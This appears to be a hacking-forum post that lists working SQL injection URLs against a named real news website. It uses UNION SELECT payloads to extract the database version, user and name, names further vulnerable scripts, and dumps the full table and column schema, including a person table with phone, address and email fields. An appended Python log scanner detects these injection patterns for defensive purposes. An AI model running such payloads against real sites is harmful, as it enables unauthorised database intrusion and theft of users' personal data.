Originally posted by Tigger
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,concat_ws(0x2f,version(),user(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
5.0.45-log/u32888@10.10.223.204/u32888
All tables:
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables/*
All columns:
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,column_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.columns/*
Let me make a few corrections:
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
, i.e. there are 26 columns, not 25.
The list of tables and columns is obtained like this:
Code:
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.tables+limit+0,1--
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,column_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.columns+where+table_name+like+char(112,101,114,115,111,110)+limit+0,1--
There are also other vulnerable scripts:
Code:
http://www.fondsk.ru/article.php?id=1505+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
http://www.fondsk.ru/page.php?id=6+union+select+1,2,3,4,5,6,7,8--
http://www.fondsk.ru/articlelist.php?section_id=2+union+select+1--
http://www.fondsk.ru/articlelist.php?&section_id=14&mode=brief'
http://www.fondsk.ru/author.php?id=160'
http://www.fondsk.ru/articlelist.php?author_id=6'
List of tables and columns:
Code:
**********************
article
----------------------
id
section_id
author1_id
author2_id
author3_id
title
subtitle
keywords
body
flag_hidden
date_publish_ru
date_publish_en
date_create
descript
imgurl
flag_hidden_mui
tik_id
tags
**********************
author
----------------------
id
lastname
firstname
secondname
fio
prefix
suffix
title
bio
**********************
comment
----------------------
id
article_id
comment_id
author
email
subject
body
flag_hidden
flag_approved
date_publish
ip
**********************
content
----------------------
id
title
subtitle
body
createdate
type
parentid
**********************
page
----------------------
id
name
keywords
flag_hidden
body
sequence
url
flag_hidden_mui
**********************
partner
----------------------
id
name
url
flag_hidden
sequence
flag_hidden_mui
bannerurl
**********************
partner_article
----------------------
id
partner_id
title
subtitle
url
flag_hidden
hits
sequence
author
**********************
person
----------------------
id
login
firstname
secondname
lastname
newlastname
birthdate
group_id_before
group_id_after
degree_id
married
sex
jobplace
jobplace_show
industry_id
position
position_show
jobsite
phoned
phoned_show
phoner
phoner_show
phonem
phonem_show
email
email_show
homepage
country_id
city
address
address_show
alive
status
interest_prof
hobby
comment
admin_comment
children
webpage
**********************
section
----------------------
id
name
keywords
sequence
flag_hidden
flag_hidden_mui
type
imgurl
**********************
stat
----------------------
tm
ip
useragent
url
**********************
subscriber
----------------------
id
email
flag_hidden
activationcode
periodicity
flag_hidden_mui
**********************
subscription
----------------------
id
dtstart
dtend
status
dtlaunch
mailsent
flag_hidden_mui
periodicity
**********************
tik
----------------------
id
name
subtitle
url
**********************
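
For the site owner's side of the requests above, a log check as an added example (not part of the original post): it flags access-log entries where the integer parameters named in the post (`id`, `section_id`, `author_id`) carry anything but digits, plus the markers visible in the posted requests. The log lines, host addresses and function names are constructed for illustration; the underlying fix remains casting these parameters to integers or using prepared statements in the PHP scripts.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters that the scripts named in the post treat as integers.
NUMERIC_PARAMS = {"id", "section_id", "author_id"}

# Markers visible in the posted requests, matched after URL decoding.
MARKERS = {
    "union_select": re.compile(r"\bunion\s+select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "comment_terminator": re.compile(r"(--|/\*)\s*$"),
    "stray_quote": re.compile(r"['\"]"),  # noisy on free-text parameters
}

# Pulls the request target out of a combined-log-format line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def inspect_request(target):
    """Return sorted findings for one request target (path?query)."""
    findings = set()
    # parse_qsl decodes %xx and turns '+' into a space, as PHP does.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
            findings.add(f"non_integer:{name}")
        for label, pattern in MARKERS.items():
            if pattern.search(value):
                findings.add(label)
    return sorted(findings)

def scan(lines):
    """Return (target, findings) for every log line with at least one finding."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        if match and (found := inspect_request(match.group(1))):
            hits.append((match.group(1), found))
    return hits

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2008:10:00:00 +0300] "GET /article.php?id=1505 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2008:10:00:05 +0300] "GET /author.php?id=160\' HTTP/1.1" 200 312',
    '198.51.100.9 - - [01/Jan/2008:10:00:09 +0300] "GET /article.php?id=-1+union+select+1,2,3+from+information_schema.tables-- HTTP/1.1" 200 4980',
]

if __name__ == "__main__":
    for target, found in scan(SAMPLE_LOG):
        print(target, found)
```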